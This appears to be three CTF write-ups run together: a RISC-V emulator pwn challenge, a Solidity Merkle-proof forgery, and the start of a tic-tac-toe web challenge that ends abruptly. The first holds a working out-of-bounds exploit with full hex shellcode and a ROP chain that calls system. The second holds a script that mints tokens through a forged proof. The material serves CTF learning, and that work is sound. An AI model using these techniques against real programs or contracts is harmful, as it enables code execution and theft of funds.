Although I did not have much time to spend on the challenges due to family stuff, I was able to solve one web challenge (Blog) in time. I spent the remaining time trying to solve the challenge of this write-up. It is worth saying that I spent some time trying to solve another web challenge; however, my mind was really focused on solving this pwn challenge.
CS2100 was a challenge in the pwn category. When you downloaded and unzipped the zip file, everything was ready to run the challenge and try it locally.
Basically, you could connect to the server and input your hex-encoded shellcode; the server saves it to a temporary file and runs the emulator with this temporary file as argument.
#!/usr/bin/env python3
from tempfile import NamedTemporaryFile
from subprocess import check_output, Popen, STDOUT, DEVNULL
def print_banner():
print("""
_____ _____ ___ __ ___ ___
/ ____|/ ____|__ \/_ |/ _ \ / _ \
| | | (___ ) || | | | | | | |
| | \___ \ / / | | | | | | | |
| |____ ____) |/ /_ | | |_| | |_| |
\_____|_____/|____||_|\___/ \___/
""")
def main():
print_banner()
s = input("Please enter your code (hex-encoded):\n")
# Remove all whitespace
s = ''.join(s.split())
try:
d = bytes.fromhex(s)
except ValueError:
print("Invalid hex!")
exit()
with NamedTemporaryFile() as temp_file:
temp_file.write(d)
temp_file.flush()
filename = temp_file.name
print("\nOutput:")
with Popen(["./main", filename], stderr=STDOUT, stdin=DEVNULL) as process:
process.wait()
if __name__ == "__main__":
main()
The binary main
was a RISC-V emulator. The organizers were kind enough to provide the source code of this binary, which was very helpful because it would have been too hard and time-consuming to reverse engineer it.
The first thing that I tried was to read the source code and look for vulnerabilities. Quickly, I found a buffer overflow in the read_file
function at main.c
. Let’s look at what happens in the main function:
int main(int argc, char* argv[]) {
if (argc != 2) {
printf("Usage: rvemu <filename>\n");
exit(1);
}
// Initialize cpu, registers and program counter
struct CPU cpu;
cpu_init(&cpu);
// Read input file
read_file(&cpu, argv[1]);
...
}
The main function allocates a CPU
struct in the stack, then it initializes it through the function cpu_init
:
void cpu_init(CPU *cpu) {
cpu->regs[0] = 0x00; // register x0 hardwired to 0
cpu->regs[2] = DRAM_BASE + DRAM_SIZE; // Set stack pointer
cpu->pc = DRAM_BASE; // Set program counter to the base address
}
Next, the main function reads a file through the function read_file
:
void read_file(CPU* cpu, char *filename)
{
...
// copy the bin executable to dram
memcpy(cpu->bus.dram.mem, buffer, fileLen*sizeof(uint8_t));
...
}
Now, let’s look carefully at the CPU
, BUS
and DRAM
structs:
typedef struct CPU {
uint64_t regs[32]; // 32 64-bit registers (x0-x31)
uint64_t pc; // 64-bit program counter
uint64_t csr[4069];
struct BUS bus; // CPU connected to BUS
} CPU;
typedef struct BUS {
struct DRAM dram;
} BUS;
#define DRAM_SIZE 1024*1024*1
#define DRAM_BASE 0x80000000
typedef struct DRAM {
uint8_t mem[DRAM_SIZE]; // Dram memory of DRAM_SIZE
} DRAM;
We can see by the code above that mem
is an array with size 1048576. Also, note that there’s no bound check when memcpy
is executed! There is clearly a buffer overflow here. Nonetheless, the binary was compiled with a stack canary, so this bug alone was useless.
My first idea was to craft a shellcode that executes /bin/sh
and gives me a shell. But how can we execute syscalls in this architecture? As a total noob I had to Google it and found that there’s an instruction called ecall
. However, if we look at the source code, there’s no implementation for this instruction. 😥 Besides, it would not work anyway! Why? Well, even if we get a shell, we could not interact with it, because the server would not read any more data after we send our shellcode.
void exec_ECALL(CPU* cpu, uint32_t inst) {}
My next idea was to somehow get RIP control and pwn the challenge. But how? Well, while playing a bit with the binary and reading about the instructions of the architecture, I eventually found two interesting instructions: ld and sd.
Now, let’s take a look at how those instructions are defined in the source code:
void exec_LD(CPU* cpu, uint32_t inst) {
// load 8 byte to rd from address in rs1
uint64_t imm = imm_I(inst);
uint64_t addr = cpu->regs[rs1(inst)] + (int64_t) imm;
cpu->regs[rd(inst)] = (int64_t) cpu_load(cpu, addr, 64);
print_op("ld\n");
}
void exec_SD(CPU* cpu, uint32_t inst) {
uint64_t imm = imm_S(inst);
uint64_t addr = cpu->regs[rs1(inst)] + (int64_t) imm;
cpu_store(cpu, addr, 64, cpu->regs[rs2(inst)]);
print_op("sd\n");
}
Basically, as there’s no bounds check, we can read and write out-of-bounds! But, how can we get RIP control? Where should we write? If you remember how the CPU struct is initialized, you may notice that the sp
register points to nearly the end of the mem
array. Let’s take a look at how the stack is when the execution ends:
Long story short: If we read at sp+8
, we will hit the stack canary! Therefore, we can get RIP control overwriting the main return address at sp+24
! Cool.
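To convince myself of where sp lands, the struct layout can be mirrored with ctypes. This sketch assumes the emulator translates a guest address into mem[addr - DRAM_BASE], which I did not show above, so take host_offset as a hypothetical helper; the field sizes are the ones from the structs listed earlier:

```python
import ctypes

DRAM_SIZE = 1024 * 1024 * 1
DRAM_BASE = 0x80000000


class DRAM(ctypes.Structure):
    _fields_ = [("mem", ctypes.c_uint8 * DRAM_SIZE)]


class BUS(ctypes.Structure):
    _fields_ = [("dram", DRAM)]


class CPU(ctypes.Structure):
    _fields_ = [
        ("regs", ctypes.c_uint64 * 32),
        ("pc", ctypes.c_uint64),
        ("csr", ctypes.c_uint64 * 4069),
        ("bus", BUS),
    ]


def host_offset(guest_addr):
    """Offset from the start of the CPU struct, assuming mem[addr - DRAM_BASE]."""
    return CPU.bus.offset + (guest_addr - DRAM_BASE)


initial_sp = DRAM_BASE + DRAM_SIZE  # value set by cpu_init
print(ctypes.sizeof(CPU), host_offset(initial_sp))
```

Both numbers come out equal: the initial sp maps to the first byte after the CPU struct, so any positive offset from sp already reads or writes main's stack frame beyond the emulated memory.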
Finally, we can summarize our shellcode as follows:
- Load __libc_start_call_main+128 into a register, so we can calculate the addresses of the needed functions and gadgets
- Calculate the address of a ret gadget and store it into sp+24
- Calculate the address of a pop rdi ; ret gadget and store it into sp+32
- Load the stack address found at sp+56 and store it into sp+40
- Calculate the address of system and store it into sp+48
- Write the command to the location referenced by the sp+56 address pointer
As we cannot interact with a shell, we need to make system execute a command that returns the flag. Also, we know that the flag is in the same folder and it is a file called flag, so if we can execute cat f*, it will be enough.
I chose to place the command at the end of my shellcode, so I could use the pc
pointer to load it into a register and later store it to a stack address.
Finally, the final shellcode was:
ld a0, 24(sp) ; load __libc_start_call_main+128 address at a0
addi a0, a0, -128 ; subtract 128 from __libc_start_call_main+128
addi a1, a0, -58 ; get 'ret' gadget address
sd a1, 24(sp) ; store ret gadget address at stack
lui a1, 0x6d5 ; load 0x6d5000 at a1
srli a1, a1, 12 ; shift right a1 by 12
add a2, a0, a1 ; get 'pop rdi ; ret' gadget address
sd a2, 32(sp) ; store 'pop rdi ; ret' gadget address at stack
lui a1, 0x27050 ; load 0x27050000 at a1
srli a1, a1, 12 ; shift right a1 by 12
add a2, a0, a1 ; get 'system' addr
sd a2, 48(sp) ; write 'system' addr stack
ld a1, 56(sp) ; get stack address
sd a1, 40(sp) ; write stack address to create a pointer
auipc a1,0x0 ; load pc address at a1
ld a2, (a1) ; load stack address pointed by pc
sd a2, 288(sp) ; write command 'cat f*' at stack
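The address arithmetic done by the shellcode is easier to follow in plain Python. The offsets below are the ones used in the listing (valid only for my local libc), the leaked value is a made-up number, and the function name is mine:

```python
def rop_targets(leaked_return_address):
    """Recompute the addresses the shellcode derives from the leaked pointer."""
    base = leaked_return_address - 128  # __libc_start_call_main
    return {
        "ret": base - 58,
        "pop_rdi_ret": base + (0x6D5000 >> 12),   # lui 0x6d5 + srli 12
        "system": base + (0x27050000 >> 12),      # lui 0x27050 + srli 12
    }


# The command stored at the end of the shellcode, as it appears in the hex dump.
command = bytes.fromhex("63617420662a00")

targets = rop_targets(0x1000)  # made-up leak, just to show the arithmetic
print({name: hex(addr) for name, addr in targets.items()}, command)
```

The lui plus srli pair is one way to build constants that do not fit the 12-bit signed immediate of addi, such as 0x27050.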
I used this gem to get the asm of the shellcode. I just had to change the generated code to little endian in order to make it work in the challenge.
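The byte-order conversion itself is a one-liner per instruction. In the sketch below the two 32-bit words are my reading of the first two instructions of the listing (ld a0, 24(sp) and addi a0, a0, -128); packing them as little-endian reproduces the first bytes of the final hex string:

```python
import struct

# 32-bit instruction words as an assembler would print them (assumed values
# for the first two instructions of the listing).
words = [
    0x01813503,  # ld a0, 24(sp)
    0xF8050513,  # addi a0, a0, -128
]

# "<I" packs each word as a little-endian unsigned 32-bit integer.
shellcode_hex = "".join(struct.pack("<I", word).hex() for word in words)
print(shellcode_hex)
```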
Finally, our hex coded shellcode was:
03358101130505f8930565fc233cb100b7556d0093d5c5003306b5002330c102b705052793d5c5003306b5002338c102833581032334b1029705000003b605002334c112000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000063617420662a00
When we ran it, we got the flag:
I solved this challenge when the CTF was already over, and I did not read any write-ups before writing this one. It was probably not the best solution, but as Gynvael always says: “A solution is always a solution”. Whether it is the best, the worst or the unintended one, it is still a solution. Also, I tested everything locally; I believe the same idea would work on the CTF server if we adjusted the libc offsets.
NahamCon EU CTF started on December 16th and lasted 24 hours. It had all the most common types of challenges such as web, pwn, reverse, crypto, etc. I could not play the entire event, so I dedicated most of my play time to the Web3 challenges, since they are not yet too common in CTFs and I always have a good time solving challenges like these.
Big thanks to Halborn for providing the web3 challenges :-)
The challenge itself is not difficult once you understand some core concepts of Solidity, a programming language used to create smart contracts on the Ethereum network, and a little bit of how XOR works.
So, I’ll try here to bring as much detail as I can even in some basic things from this world.
The challenge is called Merkle Heist and had at the end of the CTF a total of 11 solves.
In order to interact with the smart contract deployed in our private RPC URL I used Brownie Framework. It is a Python-based development and testing framework for smart contracts targeting the Ethereum Virtual Machine.
Here’s a quick link for installation: Install Brownie
Before we start analyzing the vulnerable contract, we need to configure our environment to communicate with the Ethereum private node that was given to us.
In order to accomplish this, we need to tell brownie where to connect when running our tests. We can do that by creating a custom network passing the private RPC URL as parameter.
Run: brownie networks add Ethereum CTF-Merkle-heist host=https://ctf.nahamcon.com/challenge/41/aa0e6c2d-efea-455f-8802-83c8df461a1d chainid=1337
Replace the host parameter with your private RPC URL.
Now, brownie will be able to interact with the contract deployed for the challenge.
When we download the zip file, we get a bunch of files that we’ll need to analyze to solve the challenge. But before that, let’s find out what condition we need to meet to solve it.
Inside the scripts folder we see the challenge.py file. It basically deploys the contract we must target and holds the condition to solve it. Let’s first check the solved function:
def solved():
    token = SimpleToken[-1]
    # You should mint 100000 amount of token.
    if token.totalSupply() == 200000:
        return True, "Solved!"
    else:
        return False, "Not solved, you need to mint enough to solve."
That first comment says it all: we must mint 100000 STK (Simple Tokens) to beat it.
Crypto minting basically refers to the process of creating new coins through verification of data, creation of new blocks, and documentation of the verified information on a blockchain network through Proof of Stake consensus. From 101blockchains
Let’s take a look now at the deploy function:
def deploy():
    ADMIN = accounts[9]
    token = SimpleToken.deploy('Simple Token', 'STK', {'from': ADMIN})
    _merkleRoot = 0x654ef3fa251b95a8730ce8e43f44d6a32c8f045371ce6a18792ca64f1e148f8c
    airdrop = Airdrop.deploy(token, 1e5, _merkleRoot, 4, {'from': ADMIN})
    token.setAirdropAddress(airdrop, {'from': ADMIN})
    merkleProof = [
        int(convert.to_bytes(ADMIN.address).hex(),16),
        0x000000000000000000000000feb7377168914e8771f320d573a94f80ef953782,
        0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6,
        0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563
    ]
    airdrop.mintToken(merkleProof)
The deploy function is also pretty straightforward:
- Deploys the simpleToken contract (we’ll talk about it more later)
- Deploys the airdrop contract
- Calls setAirdropAddress from the token contract (so they can communicate correctly)
- Calls mintToken from the airdrop contract, passing the merkleProof as parameter
This is all we need to know from this file. Now let’s understand what exactly is going on in each step.
The deploy function sets the ADMIN account to a local account from that chain. Let’s take Ganache, from Truffle Suite, as an example. Ganache creates a personal Ethereum blockchain which can be used to run tests, execute commands, and inspect the blockchain.
The image above represents a local ganache client running on my machine. I can use it to deploy contracts and look for bugs or develop awesome contracts, for example. As you can see, it generates a few (10) local accounts with 100 ETH balance and runs on my localhost:7545.
With that being said, the admin account is the one located at index 9 of the local accounts array created for the challenge.
Here, the script deploys the simpleToken contract present inside the contracts folder (we’ll analyze it shortly), passing these parameters:
- Token name: Simple Token
- Token symbol: STK
- Sender account: ADMIN
We’ll talk more about the _merkleRoot value later, but let’s save this constant.
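The script then deploys the airdrop contract, passing a few parameters:
- The token contract deployed above
- Amount of tokens dropped per address: 100000
- The merkleRoot constant
- Expected length of the merkleProof array: 4
- Sender account: ADMIN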
Now that we know our goal, to solve the challenge we must find a way to mint these extra 100000 STK. The simpleToken.sol contract implements this mint function:
function mint(address addr, uint256 amount) external {
    require(msg.sender == airdropAddress, "You can't call this");
    _mint(addr, amount);
}
This require is very clear. In order to mint tokens, the sender must be the airdrop contract; we cannot do this directly from our account. We must find a way inside the airdrop contract to mint the tokens we need.
There’s a function in this contract that we surely have to attack, mintToken:
function mintToken(bytes32[] memory merkleProof) external {
    require(!dropped[msg.sender], "Already dropped");
    require(merkleProof.length == proofLength, "Tree length mismatch");
    require(address(uint160(uint256(merkleProof[0]))) == msg.sender, "First Merkle leaf should be the msg.sender's address");
    require(proofHash(merkleProof) == merkleRoot, "Merkle proof failed");
    dropped[msg.sender] = true;
    token.mint(msg.sender, dropPerAddress);
    _latestAcceptedProof = merkleProof;
}
In order to mint our tokens, we must pass these four conditions:
- Our address must not be in the dropped mapping, which means that we cannot mint tokens more than once with the same user.
- The merkleProof parameter that we pass must have a length equal to 4.
- The first element of the merkleProof parameter must contain the address of the caller of the function (our account).
- The result of the proofHash function, called with the merkleProof as parameter, must be equal to the merkleRoot constant defined moments ago.
Alright, after all that introduction we know where to look. Let’s start bypassing these annoying checks and solve it!
require(!dropped[msg.sender], "Already dropped");
This require checks if the msg.sender (us) has already minted any tokens. To bypass this we only need a fresh account. So no headaches here.
✅ Use an account that hasn’t minted any tokens in this contract.
require(merkleProof.length == proofLength, "Tree length mismatch");
This function accepts a bytes32 array called merkleProof as parameter. The challenge.py file has an example that we can use to illustrate:
merkleProof = [
    int(convert.to_bytes(ADMIN.address).hex(),16),
    0x000000000000000000000000feb7377168914e8771f320d573a94f80ef953782,
    0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6,
    0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563
]
✅ We need to make sure that the merkleProof we send has a length of 4.
require(address(uint160(uint256(merkleProof[0]))) == msg.sender, "First Merkle leaf should be the msg.sender's address");
Let’s create a script that will solve the challenge. This first part calculates the first element of the merkleProof array.
from brownie import Airdrop, accounts, Wei, convert

def test_solve():
    # Set the deployed contract address
    contract = Airdrop.at("0xA15BB66138824a1c7167f5E85b957d04Dd34E468")
    # Get the first local account to be our account for testing
    account = accounts[0]
    # Print some variables to stdout
    print(f"[+] Contract: {contract}")
    print(f"[+] Account: {account}")
    print(f"[+] Admin Account: {accounts[9]}")
    # Calculate the first element of our array
    merkleProof = [
        convert.to_bytes(account.address).hex()
    ]
    # Print it
    print(merkleProof)
Running this we get:
The expression address(uint160(uint256(merkleProof[0]))) only takes the 20 least significant bytes of the 32-byte value as our address. If we send:
0x000000000000000000000000f39fd6e51aad88f6f4ce6ab8827279cfffb92266
or 0xa1b2c3d4e5f6000000000000f39fd6e51aad88f6f4ce6ab8827279cfffb92266
they will both be accepted in this third check, since the 12 most significant bytes are not considered.
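To make the truncation concrete, here is a small Python sketch of what that cast does. It only models the arithmetic with plain integers; the helper name to_address is my own and is not part of the contract or of Brownie.

```python
# Model of Solidity's address(uint160(uint256(word))): keep only the low 160 bits.
ADDRESS_MASK = (1 << 160) - 1

def to_address(word: int) -> str:
    """Return the 20-byte address stored in the low bits of a 32-byte word."""
    return "0x" + format(word & ADDRESS_MASK, "040x")

clean = 0x000000000000000000000000f39fd6e51aad88f6f4ce6ab8827279cfffb92266
dirty = 0xa1b2c3d4e5f6000000000000f39fd6e51aad88f6f4ce6ab8827279cfffb92266

print(to_address(clean))
print(to_address(dirty))
# Both words collapse to the same address, so both would pass the third check.
print(to_address(clean) == to_address(dirty))
```

The 12 high bytes are simply masked away, which is why they are free for us to choose.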
✅ Calculate the first parameter of our merkleProof
require(proofHash(merkleProof) == merkleRoot, "Merkle proof failed");
This one we’ll have to work a little harder to bypass. It requires the result of the proofHash function, called with our merkleProof as argument, to be equal to the merkleRoot constant that we saw earlier and that was passed to the constructor.
Let’s take a look at the proofHash function:
function proofHash(bytes32[] memory nodes) internal pure returns (bytes32 result) {
    result = pairHash(nodes[0], nodes[1]);
    for (uint256 i = 2; i < nodes.length; i++) {
        result = pairHash(result, nodes[i]);
    }
}
It accepts a bytes32 array as a parameter (our merkleProof) and calls another function, pairHash, with the merkleProof elements.
The pairHash function looks like this:
function pairHash(bytes32 a, bytes32 b) internal pure returns (bytes32) {
    return keccak256(abi.encode(a ^ b));
}
This function simply does the following: it XORs a and b, ABI-encodes the result, and returns its keccak256 hash.
Keccak256 is a cryptographic hash function built into Solidity. It takes an input of any length and converts it to a fixed-size 32-byte hash.
The diagram below represents the flow inside the proofHash function.
So, we need to figure out a way to arrive at the same merkleRoot as the one set in the constructor. To accomplish this, we must abuse how XOR works. We know that in the first case, the one shown in the challenge.py file, the following happened:
0x000000000000000000000000a0Ee7A142d267C1f36714E4a8F75612F20a79720 ^ 0x000000000000000000000000feb7377168914e8771f320d573a94f80ef953782
=
0x5e594d6545b7329847826e9ffcdc2eafcf32a0a2
So, we need the parameter of the first call to keccak256 inside the pairHash function to be equal to 0x5e594d6545b7329847826e9ffcdc2eafcf32a0a2 to achieve the same hash.
According to XOR properties, we have:
A ^ B = C --> A ^ C = B
We are only missing the second element of our fake merkleProof. Let’s calculate the bytes32 that we need to get the same hash:
0xf39fd6e51aad88f6f4ce6ab8827279cfffb92266 ^ 0x5e594d6545b7329847826e9ffcdc2eafcf32a0a2 = 0xadc69b805f1aba6eb34c04277eae5760308b82c4
0xf39f… is our test account
0x5e59… is the result we need to be hashed to get the same merkle root
0xadc6… is now the second element of our merkle proof array
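If you want to double check the arithmetic, the two XOR steps can be reproduced with plain Python integers. The variable names below are mine; the values are the ones used in this write-up.

```python
# Values taken from challenge.py and from our test account.
admin = 0xa0Ee7A142d267C1f36714E4a8F75612F20a79720
second = 0xfeb7377168914e8771f320d573a94f80ef953782
ours = 0xf39fd6e51aad88f6f4ce6ab8827279cfffb92266

# Value that gets hashed in the first pairHash call of the admin's proof.
target = admin ^ second

# A ^ B = C  -->  A ^ C = B, so this is the second element we must send.
forged = ours ^ target

print(hex(target))
print(hex(forged))
# Sanity check: our pair produces exactly the same XOR result.
print(ours ^ forged == target)
```

Since the input to the first hash is identical, everything computed after it is identical too.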
We now have a merkleProof that will pass all checks and mint some tokens for us:
merkleProof = [
    0x000000000000000000000000f39fd6e51aad88f6f4ce6ab8827279cfffb92266, # Our testing account
    0x000000000000000000000000adc69b805f1aba6eb34c04277eae5760308b82c4, # New element calculated
    0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6,
    0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563
]
Elements at index 2 and 3 remained the same.
✅ Created the new merkle proof array with our account
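As a rough offline check of the idea, the sketch below models proofHash in Python and compares the admin proof with our forged one. Big assumption: I use hashlib.sha3_256 only as a stand-in hash, and it is NOT the same function as Solidity's keccak256, so the printed root will not match the real merkleRoot. The point is only that both proofs end up at the same root for any hash, because the first hashed value is identical.

```python
import hashlib

def pair_hash(a: int, b: int) -> int:
    # Stand-in for keccak256(abi.encode(a ^ b)).
    # ASSUMPTION: SHA3-256 replaces Keccak-256 here, so digests differ from on-chain ones.
    data = (a ^ b).to_bytes(32, "big")  # a single bytes32 ABI-encodes to its 32 bytes
    return int.from_bytes(hashlib.sha3_256(data).digest(), "big")

def proof_hash(nodes):
    # Same folding order as the contract's proofHash.
    result = pair_hash(nodes[0], nodes[1])
    for node in nodes[2:]:
        result = pair_hash(result, node)
    return result

admin_proof = [
    0x000000000000000000000000a0Ee7A142d267C1f36714E4a8F75612F20a79720,
    0x000000000000000000000000feb7377168914e8771f320d573a94f80ef953782,
    0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6,
    0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563,
]
forged_proof = [
    0x000000000000000000000000f39fd6e51aad88f6f4ce6ab8827279cfffb92266,
    0x000000000000000000000000adc69b805f1aba6eb34c04277eae5760308b82c4,
    0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6,
    0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563,
]

# Same root for both proofs, whatever the underlying hash function is.
print(proof_hash(admin_proof) == proof_hash(forged_proof))
```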
After all that calculation, the final script would look something like this:
from brownie import Airdrop, accounts, Wei, convert

def test_solve():
    contract = Airdrop.at("0xA15BB66138824a1c7167f5E85b957d04Dd34E468")
    account = accounts[0]
    print(f"[+] Contract: {contract}")
    print(f"[+] Account: {account}")
    print(f"[+] Admin Account: {accounts[9]}")
    merkleProof = [
        0x000000000000000000000000f39fd6e51aad88f6f4ce6ab8827279cfffb92266,
        0x000000000000000000000000adc69b805f1aba6eb34c04277eae5760308b82c4,
        0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6,
        0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563
    ]
    contract.mintToken(merkleProof, {"from": account})
    print(f"\n[+] Last accepted proof: {contract.latestAcceptedProof()}")
All we have to do now is go to the platform and hit that juicy solve button and get our points! 🏁🏁🏁
This was indeed an easy challenge. The main idea here was to give an introduction to this world of web3 hacking and provide some info on how to start, what to use, and a few Solidity tips. I myself have been playing around with it for just a couple of months, but it has been quite fun. If you wanna know more and hack more web3 challenges, I strongly recommend you start with the Ethernaut wargame from OpenZeppelin.
I know that I skipped a few things about Solidity, Brownie, and even Merkle trees themselves. I strongly recommend that you check out the references below.
If you wanna discuss more about it, feel free to reach me on Twitter or LinkedIn :-)
thanks for reading 👽 👽 👽
In this write-up, I explain the web challenge Jogo da Velha (Tic-Tac-Toe) and the proposed method of solu.. hacking :)
To make life easier for anyone just getting started, I'll be quite detailed in some places, focusing on the line of reasoning that leads to the solution.
Join hundreds of athletes around the world to compete for the title of best player of the year at the Tic-Tac-Toe World Cup!!
The flag is the password of the "admin" user
In this challenge you have a Tic-Tac-Toe game where you compete against the server's “artificial intelligence”, which is just a random, of course :)
After registering and logging in, you can create new games and play against the machine, as well as list the games already created and resume them.
The application's source code is available, allowing a deeper analysis of its behavior.
For those who did not have access and want to try it, I made the challenge code available on GitHub.
The code comes with a docker-compose.yml file to make setup easier, mainly because we have a composition of an application and a MySQL database.
So, to start the challenge, you need to have the tools below installed:
With the tools installed, you can enter the folder and type:
$ docker compose up
Note: the database container takes a LONG time to be created the first time (at least 5 minutes or so), and the application container keeps failing and restarting until the database is available. Note: I already know how to improve this, but I did not have time to work on it before the CTF.
Example output:
neptunian:~/safe/bhack-ctf-jogo-da-velha$ docker compose up
[+] Running 2/2
⠿ Container bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 Created 0.5s
⠿ Container bhack-ctf-jogo-da-velha-tic-tac-toe-1 Created 0.3s
Attaching to bhack-ctf-jogo-da-velha-jogo-da-velha-db-1, bhack-ctf-jogo-da-velha-tic-tac-toe-1
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28 23:22:30+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.29-1.el8 started.
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28 23:22:30+00:00 [Note] [Entrypoint]: Switching to dedicated user 'mysql'
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28 23:22:30+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.29-1.el8 started.
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28 23:22:30+00:00 [Note] [Entrypoint]: Initializing database files
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28T23:22:30.951563Z 0 [System] [MY-013169] [Server] /usr/sbin/mysqld (mysqld 8.0.29) initializing of server in progress as process 42
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28T23:22:30.983855Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started.
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Serving Flask app 'app' (lazy loading)
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Environment: production
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | WARNING: This is a development server. Do not use it in a production deployment.
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | Use a production WSGI server instead.
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Debug mode: off
## error on the first connections (showing only the initial lines)
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | Traceback (most recent call last):
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | File "/home/ttt/.local/lib/python3.10/site-packages/mysql/connector/connection_cext.py", line 263, in _open_connection
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | self._cmysql.connect(**cnx_kwargs)
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | _mysql_connector.MySQLInterfaceError: Can't connect to MySQL server on 'jogo-da-velha-db:3306' (111)
bhack-ctf-jogo-da-velha-tic-tac-toe-1 |
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | The above exception was the direct cause of the following exception:
...
## success after a few minutes
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28T23:24:01.432841Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed.
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28T23:24:01.432906Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel.
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28T23:24:01.619661Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. Bind-address: '::' port: 33060, socket: /var/run/mysqld/mysqlx.sock
bhack-ctf-jogo-da-velha-jogo-da-velha-db-1 | 2022-11-28T23:24:01.619713Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.29' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL.
bhack-ctf-jogo-da-velha-tic-tac-toe-1 exited with code 1
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Serving Flask app 'app' (lazy loading)
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Environment: production
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | WARNING: This is a development server. Do not use it in a production deployment.
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | Use a production WSGI server instead.
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Debug mode: off
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Running on all addresses (0.0.0.0)
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | WARNING: This is a development server. Do not use it in a production deployment.
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Running on http://127.0.0.1:5000
bhack-ctf-jogo-da-velha-tic-tac-toe-1 | * Running on http://172.27.0.3:5000 (Press CTRL+C to quit)
To check that the app is working, just test it in the browser:
http://localhost:5000/
Before reading the rest of the article with the solution, I suggest trying to hack the application and get the admin password yourself.
In an app that ships with its docker-compose.yml, it is worth taking a look at the file to understand some important points.
version: '3.7'
services:
  jogo-da-velha-db:
    image: mysql:8
    restart: always
    volumes:
      - ./db/schema.sql:/docker-entrypoint-initdb.d/schema.sql:ro
    environment:
      - MYSQL_RANDOM_ROOT_PASSWORD=yes
      - MYSQL_DATABASE=ttt
      - MYSQL_USER=ttt
      - MYSQL_PASSWORD=NAO_DISPONIVEL
  tic-tac-toe:
    build: .
    restart: always
    ports:
      - 5000:5000
    environment:
      - MYSQL_DATABASE=ttt
      - MYSQL_USER=ttt_app
      - MYSQL_PASSWORD=simples
      - MYSQL_HOST=jogo-da-velha-db
    depends_on:
      - jogo-da-velha-db
Summary
Investigating schema.sql is worthwhile to understand how the data is stored, and it also brings a key piece of information.
CREATE TABLE users (
    id INTEGER PRIMARY KEY AUTO_INCREMENT,
    username VARCHAR(32) NOT NULL UNIQUE,
    password VARCHAR(100) NOT NULL,
    created DATETIME DEFAULT CURRENT_TIMESTAMP
);
CREATE TABLE games (
    id INTEGER PRIMARY KEY AUTO_INCREMENT,
    game_key VARCHAR(36) NOT NULL UNIQUE,
    user_id INTEGER NOT NULL,
    winner CHAR(1) NOT NULL DEFAULT '?',
    created DATETIME DEFAULT CURRENT_TIMESTAMP,
    CHECK (winner IN ("X", "O", "?", "*"))
);
CREATE TABLE moves (
    game_id INTEGER NOT NULL,
    position INTEGER NOT NULL,
    value CHAR(1) NOT NULL,
    created DATETIME DEFAULT CURRENT_TIMESTAMP,
    CHECK (value IN ("X", "O"))
);
INSERT INTO users (username, password)
VALUES ('admin', 'YmhhY2t7ZmxhZ19wYXJhX3Rlc3Rlc30K');
-- more lines below
The goal, according to the challenge description, is to get the password of the admin user. After briefly evaluating the code, you notice that the password for this user is stored in the database, in the users table.
The format of this password is base64 (no guessing needed here: you will see this in the application code).
To actually check the password:
echo YmhhY2t7ZmxhZ19wYXJhX3Rlc3Rlc30K | base64 -d
bhack{flag_para_testes}
Summary
